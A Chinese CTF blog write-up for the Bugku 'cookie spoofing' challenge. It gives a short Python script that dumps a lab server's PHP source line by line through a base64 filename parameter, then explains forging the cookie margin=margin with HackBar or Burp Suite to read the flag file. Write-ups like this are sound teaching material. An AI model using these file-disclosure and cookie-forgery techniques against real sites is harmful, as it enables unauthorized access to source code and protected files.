cookie欺骗(bugku)

最新推荐文章于 2024-04-30 10:30:34 发布
最新推荐文章于 2024-04-30 10:30:34 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: writeup 网络安全 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46396711/article/details/116231357
版权

解题思路:

  • 打开链接,发现是一串无意义的字符串在这里插入图片描述
  • 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。
    在这里插入图片描述当line=1时
    在这里插入图片描述当line=2时
    在这里插入图片描述可通过python脚本将该文件内容打印出来
import requests

a=25 #表示index.php文件的代码行数
for i in range(a):
    url="http://114.67.246.176:13625/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
    s=requests.get(url)
    print(s.text)

结果为:

<?php


error_reporting(0);


$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");


$line=isset($_GET['line'])?intval($_GET['line']):0;


if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");


$file_list = array(


'0' =>'keys.txt',


'1' =>'index.php',


);


 


if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){


$file_list[2]='keys.php';


}


 


if(in_array($file, $file_list)){


$fa = file($file);


echo $fa[$line];


}


?>

联系题目描述,发现当cookie值为margin时显示keys.php内容

  • 可用hackbar提交cookie(记得修改filename值为keys.php的base64编码)在这里插入图片描述
  • 也可通过burpsuite抓包,修改Cookie属性值
  • 结果为空白页,查看源码即可得到flag。

小结
cookie欺骗类题目,首先要发现cookie,然后才能利用发现的cookie通过burpsuite等工具进行欺骗。
cookie发现:对于隐藏在文件中的cookie,要想办法打印出该文件

流年忆雨*
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cookie欺骗
FreeXploiT
10-25 2040
现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9 和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 COOKIE欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通 讯协议无影响,所以要进行cookie欺骗可以有多种途径: 1、跳过浏览器,直接对通讯数据改写 2、修改
桂林老兵cookie欺骗工具
10-11
经典的cookie欺骗工具
Web 渗透测试神器:HackBar 保姆级教程
最新发布
Flag少侠的博客
04-30 5208
HackBar 允许用户自定义 HTTP 请求,并可以通过插件直接发送这些请求。用户可以手动构造 GET、POST、PUT、DELETE 等类型的请求,并添加自定义的 HTTP 头部、参数等信息。
“黑客”入门学习之“Cookie技术详解”
Y525698136的博客
06-10 1900
今天就以本篇文章详细给大家介绍一下Cookie是什么?Cookie基本原理与实现?Cookie到底存在哪些安全隐患,我们该如何防御,有没有其他技术替代方案?
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 645
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
CTF学习记录006-Cookie欺骗、认证、伪造
wupeng_ccab的博客
09-14 696
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
Bugku——cookies欺骗
Dig_的博客
09-22 1110
URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。 key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。 index.php用base64加密后替换key.txt的base64,页面存在却没有内容,查看源码发现只有&amp;amp;lt;?php ,说明源码需要加参数遍历。 发现给参数line一个个传入值才有源码,写脚本遍历出源码 import...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
桂林老兵cookie欺骗
07-02
【桂林老兵cookie欺骗】是一种网络安全测试技术,主要针对网站的cookie管理机制进行模拟攻击测试,以评估网站的安全性。在互联网应用中,cookie是服务器发送到用户浏览器并存储的一小块数据,用于维持用户会话状态、...
cookie 修改欺骗必备工具
12-29
在网络安全领域,Cookie修改欺骗是一种常见的技术,常用于测试网站的安全性、理解用户跟踪机制以及进行恶意攻击。本文将深入探讨Cookie的相关知识,包括其原理、作用,以及如何使用修改工具进行欺骗操作。 Cookie是...
Cookie欺骗工具
08-06
Cookie 欺骗 工具
cookie欺骗bugku
hhh
09-06 2432
利用cookie值进行攻击; 完全没有一点经验,看到这个提示,我唯一能想到的就是用burpsuite抓包后修改一下cookie值,也许会有些什么东西;可是抓包后完全无从下手…… 然后有没有发现这道题的url跟其他的有些不一样呢?后面有一串很奇怪的参数,这熟悉的“=”,应该是base64编码,拿去解码一下:原来是&amp;fillename=key.txt; 另外url里还有一个参数:line...
cookie欺骗
paradise3011的博客
09-18 8274
cookie欺骗是用户在登录的时候极为容易被他人获取权限,植入浏览器中,从而访问到后台。 先简要认识一下cookiecookie机制是在浏览网页的时候,服务器将你的登录信息,浏览信息等发送给客户端并保存一定的时间。当你下一次访问这个网站的时候,就能读取上一次你的记录。 例如自动登录等。很多的网站都是由cookie来辨认登录者的信息。它可以起到登录验证的作用,从而存在了漏洞,可以绕过验证直接登录...
BugKucookies 欺骗
wssmiss的博客
03-25 1508
题目链接 http://123.206.87.240:8002/web11/ 查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
BUGKU-WEB cookies
天泽岁月
03-12 1190
BUGKU-WEB cookie欺骗
bugku——cookie欺骗
吃肉唐僧的博客
09-02 336
打开题目地址,一串不懂的重复的字符串 一眼就看出这个filename后面的是base64加密的字符,解密出来时keys.txt 后来访问keys.txt,发现还是这些重复的字符 后来试着将index.php也base64加密试下,而且变动line会有显示文件源码行数内容 写个脚本把他全部拿下来 前30行,代码如下 <?php error_reporting(0);...
什么是cookie欺骗
05-20
Cookie欺骗是一种网络攻击,攻击者通过伪造或篡改网站的Cookie欺骗用户和服务器,从而获取非法的访问权限。Cookie是一种网站用于存储用户信息的小文件,其中包含了用户的身份验证信息、会话信息等。攻击者可以通过窃取或伪造Cookie,冒充合法用户进行访问,或者篡改Cookie中的信息来实现非法操作,例如在用户不知情的情况下,发起转账、修改密码等操作。为了防止Cookie欺骗,网站可以采用HTTPS协议加密传输Cookie,或者使用一些防范欺骗的技术,例如Token验证、双因素认证等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值